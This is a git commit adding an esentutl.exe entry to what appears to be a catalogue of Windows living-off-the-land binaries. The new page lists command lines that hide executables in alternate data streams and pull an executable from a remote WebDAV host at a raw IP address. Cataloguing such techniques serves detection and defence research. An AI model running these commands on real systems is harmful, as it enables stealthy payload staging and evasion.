added esentutl.exe

master
api0cradle 2018-04-20 09:02:52 +02:00
parent 735c36fd9a
commit 5e86fa16cf
2 changed files with 39 additions and 0 deletions

View File

@ -13,6 +13,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Cscript.exe](OSBinaries/Cscript.md) [Cscript.exe](OSBinaries/Cscript.md)
[Dfsvc.exe](OSBinaries/Dfsvc.md) [Dfsvc.exe](OSBinaries/Dfsvc.md)
[Diskshadow.exe](OSBinaries/Diskshadow.md) [Diskshadow.exe](OSBinaries/Diskshadow.md)
[Esentutl.exe](OSBinaries/Esentutl.md)
[Extrac32.exe](OSBinaries/Extrac32.md) [Extrac32.exe](OSBinaries/Extrac32.md)
[Expand.exe](OSBinaries/Expand.md) [Expand.exe](OSBinaries/Expand.md)
[Explorer.exe](OSBinaries/Explorer.md) [Explorer.exe](OSBinaries/Explorer.md)

38
OSBinaries/Esentutl.md Normal file
View File

@ -0,0 +1,38 @@
## Esentutl.exe
* Functions: Copy, Download, Write ADS, Read ADS
```
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
```
Acknowledgements:
* egre55 - @egre55
Code sample:
*
Resources:
* https://twitter.com/egre55/status/985994639202283520
Full path:
```
c:\windows\system32\esentutl.exe
c:\windows\sysWOW64\esentutl.exe
```
Notes: